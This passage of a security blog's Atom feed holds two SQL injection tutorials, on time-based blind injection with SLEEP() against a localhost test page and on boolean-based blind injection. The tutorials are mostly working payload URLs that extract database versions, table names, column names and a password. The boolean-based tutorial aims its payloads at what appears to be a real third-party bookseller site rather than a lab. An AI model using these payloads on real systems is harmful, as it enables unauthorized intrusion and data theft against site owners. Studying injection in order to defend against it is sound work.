      &lt;h2 id=&quot;DES-Unix&quot;&gt;&lt;a href=&quot;#DES-Unix&quot; class=&quot;headerlink&quot; title=&quot;DES(Unix)&quot;&gt;&lt;/a&gt;DES(Unix)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: IvS7aeT4NzQPM&lt;/li&gt;
&lt;li&gt;Used i

    </summary>

      <category term="Z-Other" scheme="http://sec.php101.cn/categories/Z-Other/"/>


      <category term="hash" scheme="http://sec.php101.cn/tags/hash/"/>

      <category term="crypt" scheme="http://sec.php101.cn/tags/crypt/"/>

  </entry>

  <entry>
    <title>SQLi--PART VII:Time Based Blind Injection</title>
    <link href="http://sec.php101.cn/2014/12/02/SQLi--PART-VIITime-Based-Blind-Injection/"/>
    <id>http://sec.php101.cn/2014/12/02/SQLi--PART-VIITime-Based-Blind-Injection/</id>
    <published>2014-12-02T03:08:23.000Z</published>
    <updated>2016-03-17T08:39:50.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Today I’m going to be going over TIME BASED BLIND SQL INJECTiON using SLEEP().&lt;br&gt;For this example, I’m running MySQL on localhost, injecting using UNION to pull data as an example.&lt;br&gt;Now this is optional, there’s no need to use BLIND injection if you can use UNION ~ &lt;strong&gt;again I’m only doing so to provide visual examples&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id=&quot;Step1-start-your-injection&quot;&gt;&lt;a href=&quot;#Step1-start-your-injection&quot; class=&quot;headerlink&quot; title=&quot;Step1: start your injection&quot;&gt;&lt;/a&gt;Step1: start your injection&lt;/h2&gt;&lt;p&gt;First off start your injection.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;localhost/PHP/test.php?id=1&amp;apos;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;I got a syntax error.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;apos;&amp;apos;1&amp;apos;&amp;apos;&amp;apos; at line 1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Step2-use-union&quot;&gt;&lt;a href=&quot;#Step2-use-union&quot; class=&quot;headerlink&quot; title=&quot;Step2: use union&quot;&gt;&lt;/a&gt;Step2: use union&lt;/h2&gt;&lt;p&gt;Now ~ I can go ahead and start injecting. First off, I’m going to use union to retrieve a vulnerable column, to pull information out of to use as an example.&lt;br&gt;Since I know my table name is “news”, I’m going to make this fast.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;localhost/PHP/test.php?id=1&amp;apos; AND (SELECT * from news)=(1)-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;SQL Error:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Operand should contain 3 column(s)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;So my column count is 3, now I need to cancel out the query by adding a false condition, and use UNION SELECT to see my columns.&lt;br&gt;I’ll divide the page by 0 using DIV(0).&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;localhost/PHP/test.php?id=1&amp;apos; DIV(0) UNION SELECT 1,2,3-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;I can pull data from the column “2” shown above.&lt;br&gt;Let’s get the MySQL user to use later during our blind injection.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;localhost/PHP/test.php?id=1&amp;apos; DIV(0) UNION SELECT 1,user(),3-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;So my user is “root@localhost”.  &lt;/p&gt;
&lt;h2 id=&quot;Step3-TIME-BASED-INJECTION&quot;&gt;&lt;a href=&quot;#Step3-TIME-BASED-INJECTION&quot; class=&quot;headerlink&quot; title=&quot;Step3: TIME BASED INJECTION&quot;&gt;&lt;/a&gt;Step3: TIME BASED INJECTION&lt;/h2&gt;&lt;p&gt;Now I’ll switch to the TIME BASED INJECTION.&lt;br&gt;As most developers/programmers know, 1 and 0 can be used as not only integers, but booleans (true or false).&lt;br&gt;1 returns true, and 0 returns false.&lt;br&gt;So let’s check if this works by adding a true statement.&lt;br&gt;&lt;strong&gt;MySQL IF()&lt;/strong&gt;&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;IF(expression ,expr_true, expr_false);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;So it goes as following ~&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;AND (SELECT 1=(SELECT IF(1=1,SLEEP(5),NULL)))&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now what this says is IF 1 is equal to 1, sleep for 5 seconds (stop the page from loading), NULL (do nothing if false).&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF(1=1,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;It worked! Instead of an instant connection on localhost, the page didn’t respond for another 5 seconds.&lt;br&gt;Now we know of course 1 is equal to 1, but how about selecting information from the database?&lt;br&gt;Now my MySQL version is &amp;lt;5, so let’s check using TIME BASED.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;SUBSTRING(version(),1,1) = 5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This states that the first number of my MySQL version is 5.&lt;br&gt;Now you add this expression in your IF statement.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT SUBSTRING(version(),1,1))=5,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The page takes 5 seconds to load so this shows you can perform SELECT queries inside your IF statement.&lt;br&gt;Now to prove this theory. Remember back in the begginning when I got the MySQL user “root@localhost”?&lt;br&gt;Let’s try selecting this user to see if it returns true.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT user()= &amp;quot;root@localhost&amp;quot;),SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The page took another 5 seconds to load, meaning this statement is true (user is ‘root@localhost’).&lt;br&gt;Now you if you can use SELECT statements in your IF statement, you can SELECT things from the database (tables, columns, etc) (MySQL&lt;5) &lt;figure=&quot;&quot; class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;(SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/5)&gt;&lt;/p&gt;
&lt;p&gt;This will select the first table from our current database. Using blind, you need to use SUBSTRING to get them letter by letter.&lt;br&gt;In my case, I already know the table here is admin (I created it in PHPmyAdmin).&lt;br&gt;So let’s test it out…&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=&amp;quot;a&amp;quot;,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Returns true, the first letter of my table name is “a” (the table admin).&lt;br&gt;Since I know the table name already, let’s try it without using SUBSTRING() to see if the table exists.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=&amp;quot;admin&amp;quot;,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Returns true again, my table name is “admin”.  &lt;/p&gt;
&lt;p&gt;Now let’s get the columns out of the admin table. The columns I have are “username” as my first, and “password” as my second. So I’m going to save time and increment my LIMIT statement to start at the second column (password).&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name=&amp;quot;admin&amp;quot; LIMIT 1,1)=&amp;quot;p&amp;quot;,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Returns true, the first letter of the second column in my admin table is “p” (password).&lt;br&gt;Lets check if the column name is called password.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT column_name FROM information_schema.columns WHERE table_name=&amp;quot;admin&amp;quot; LIMIT 1,1)=&amp;quot;password&amp;quot;,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Returns true, my column name is password! Let’s get the data from it. (In this case the password is “lol123”).&lt;br&gt;Let’s check if it’s “lol123”.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://localhost/PHP/test.php?id=1&amp;apos; AND (SELECT 1=(SELECT IF((SELECT CONCAT(password) FROM admin LIMIT 0,1)=&amp;quot;lol123&amp;quot;,SLEEP(5),NULL)))-- x&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Returns true! My password is “lol123”. I hope you guys enjoyed this tutorial, have fun &amp;amp;&amp;amp; happy hacking!  &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: You must use SUBSTRING() to get the data letter by letter, I sped up in the case for the tutorials sake because I already knew the information.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Today I’m going to be going over TIME BASED BLIND

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


  </entry>

  <entry>
    <title>SQLi--PART VI:Boolean Based Blind Injection</title>
    <link href="http://sec.php101.cn/2014/11/28/SQLi--PART-VIBoolean-Based-Blind-Injection/"/>
    <id>http://sec.php101.cn/2014/11/28/SQLi--PART-VIBoolean-Based-Blind-Injection/</id>
    <published>2014-11-28T02:24:33.000Z</published>
    <updated>2016-03-17T08:39:40.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;So a lot of people view bling injection as having to guess everything, when it’s called blind injection because &lt;strong&gt;no data is visible on the page as an outcome&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Remember, whenever you’re injecting a site, as long as information_schema exists (version 5 or more), then you can use it to get data out of a page.&lt;/strong&gt; This includes table names, database names, columns, and all the rest..&lt;/p&gt;
&lt;p&gt;I’ll be using this site as an example.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Step1-Getting-The-Version&quot;&gt;&lt;a href=&quot;#Step1-Getting-The-Version&quot; class=&quot;headerlink&quot; title=&quot;Step1:Getting The Version&quot;&gt;&lt;/a&gt;Step1:Getting The Version&lt;/h2&gt;&lt;p&gt;Let’s start by getting the version, to see if we can use substring() to get data out of information_schema.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;It loads fine, now let’s replace the 5 with a 4 to double check.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;As you can see, the page has a huge chunk of text and pictures missing off of the page.&lt;/p&gt;
&lt;h2 id=&quot;Step2-Getting-The-Table-Names&quot;&gt;&lt;a href=&quot;#Step2-Getting-The-Table-Names&quot; class=&quot;headerlink&quot; title=&quot;Step2:Getting The Table Names&quot;&gt;&lt;/a&gt;Step2:Getting The Table Names&lt;/h2&gt;&lt;p&gt;Now let’s get the first character, of the first table name out of our database.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The page loaded fine, so we know our first characters’ ascii value is more then 0.&lt;br&gt;So we increment 0 until we get around the area it will be in.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))&amp;gt;75&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We know it’s more then 75, so let’s go up a little bit more.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))&amp;gt;80&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now we get our error, so let’s go down, and change more then, to equals to get the exact value.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=76&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We get our error, so let’s go up.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=77&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another error, let’s go up again.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=78&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;And now it loads fine, so let’s check the ascii value for 78.&lt;br&gt;You can check that here, by looking at the ASCII table.&lt;br&gt;78 comes back to “N”.&lt;br&gt;Now we know our first letter is &lt;strong&gt;N&lt;/strong&gt;, so let’s get the next letter by incrementing the 1, to a 2, in our substring() statement.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))&amp;gt;100&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We know it’s more then 100, so let’s go up to 101 now.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))&amp;gt;101&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We get our error. If the returned value is greater then 100, but not greater then 101, then it has to be 101. It’s common sense.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))=101&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;And it loads fine…Now convert the ascii value of 101 to text. It comes back to “e”.&lt;br&gt;So far we have “Ne”&lt;br&gt;Now you can either keep getting the returned values, or try and guess the table name. It looks like News, so let’s get our next character and guess.&lt;br&gt;The ascii value of “w” is 119, so let’s see if it comes out positive.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select 